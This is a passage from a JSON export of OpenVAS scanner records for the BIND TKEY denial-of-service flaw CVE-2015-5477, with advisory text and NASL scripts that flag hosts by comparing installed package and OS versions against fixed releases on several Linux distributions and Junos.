affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1513\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1513.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-lite-devel\", rpm:\"bind-lite-devel~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb-chroot\", rpm:\"bind-sdb-chroot~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.8.2~0.37.rc1.el6_7.2\", 
rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:16", "description": "Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3319-1 (bind9 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703319", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703319", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3319.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3319-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can 
redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703319\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_name(\"Debian Security Advisory DSA 3319-1 (bind9 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-28 00:00:00 +0200 (Tue, 28 Jul 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3319.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"bind9 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy), this problem has been fixed\nin version 
1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\");\n script_tag(name:\"summary\", value:\"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bind9\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bind9utils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbind9-80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libdns88\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libisc84\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"libisccc80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libisccfg82\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"liblwres80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lwresd\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-03T00:00:00", "type": "openvas", "title": "RedHat Update for bind RHSA-2015:1513-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871420", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871420", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind RHSA-2015:1513-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871420\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-03 15:08:02 +0530 (Mon, 03 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bind RHSA-2015:1513-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. 
Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1513-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-July/msg00050.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", 
rpm:\"bind-libs~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:10", "description": "Junos OS BIND on SRX-Series and J-Series is prone to a\nDenial of Service vulnerability.", "cvss3": {}, "published": "2016-01-18T00:00:00", "type": "openvas", "title": "Junos SRX and J-Series BIND DoS Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-20T00:00:00", "id": "OPENVAS:1361412562310106060", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106060", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_junos_cve-2015-5477.nasl 12431 2018-11-20 09:21:00Z asteins $\n#\n# Junos SRX and J-Series BIND DoS Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106060\");\n script_version(\"$Revision: 12431 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-20 10:21:00 +0100 (Tue, 20 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-18 09:17:30 +0700 (Mon, 18 Jan 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(\"Junos SRX and J-Series BIND DoS Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_family(\"JunOS Local Security Checks\");\n script_copyright(\"This script is 
Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", \"gb_junos_snmp_version.nasl\");\n script_mandatory_keys(\"Junos/Version\", \"Junos/model\");\n\n script_tag(name:\"summary\", value:\"Junos OS BIND on SRX-Series and J-Series is prone to a\nDenial of Service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability in ISC BIND's handling of queries for TKEY\nrecords may allow remote attackers to terminate the daemon process on an assertion failure. This\nissue affects only SRX-Series and J-Series configured with DNS Proxy server services enabled. This\nissue can affect both standalone and HA configurations.\");\n\n script_tag(name:\"impact\", value:\"Remote attackers can cause a denial of service to the DNS proxy\nserver.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 12.1, 12.3, 13.2, 13.3, 14.1, 14.2 and 15.1\");\n\n script_tag(name:\"solution\", value:\"New builds of Junos OS software are available from Juniper. 
As\na workaround disable the DNS proxy.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10718\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\n\nmodel = get_kb_item(\"Junos/model\");\nif (!model || toupper(model) !~ '^SRX' && toupper(model) !~ '^J')\n exit(99);\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version =~ \"^12\") {\n if ((revcomp(a: version, b: \"12.1X44-D55\") < 0) &&\n (revcomp(a: version, b: \"12.1X44\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.1X46-D40\") < 0) &&\n (revcomp(a: version, b: \"12.1X46\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.1X47-D30\") < 0) &&\n (revcomp(a: version, b: \"12.1X47\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.3R11\") < 0) &&\n (revcomp(a: version, b: \"12.3\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.3X48-D20\") < 0) &&\n (revcomp(a: version, b: \"12.3X48\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n}\n\nif (version =~ \"^13\") {\n if (revcomp(a: version, b: \"13.2R9\") < 0) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"13.2X51-D39\") < 0) &&\n (revcomp(a: version, b: \"13.2X51\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"13.3R8\") < 0) &&\n (revcomp(a: version, b: \"13.3\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n}\n\nif (version =~ \"^14\") {\n if (revcomp(a: version, b: \"14.1R6\") < 0) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"14.1X53-D30\") < 0) &&\n (revcomp(a: version, b: \"14.1X53\") >= 0)) {\n security_message(port: 0, data: version);\n 
exit(0);\n }\n else if ((revcomp(a: version, b: \"14.2R5\") < 0) &&\n (revcomp(a: version, b: \"14.2\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n}\n\nif (version =~ \"^15\") {\n if (revcomp(a: version, b: \"15.1R2\") < 0) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D30\") < 0) &&\n (revcomp(a: version, b: \"15.1X49\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D30\") < 0) &&\n (revcomp(a: version, b: \"15.1X49\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X53-D20\") < 0) &&\n (revcomp(a: version, b: \"15.1X53\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n}\n\n\nexit(99);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:09", "description": "Mageia Linux Local Security Checks mgasa-2015-0298", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0298", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130080", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130080", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0298.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130080\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:28 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0298\");\n script_tag(name:\"insight\", value:\"An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit (CVE-2015-5477).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0298.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0298\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.10.2.P3~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "openvas", "title": "Fedora Update for bind FEDORA-2015-12335", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869832", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869832", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2015-12335\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869832\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-01 06:54:48 +0200 (Sat, 01 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind FEDORA-2015-12335\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-12335\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163006.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n 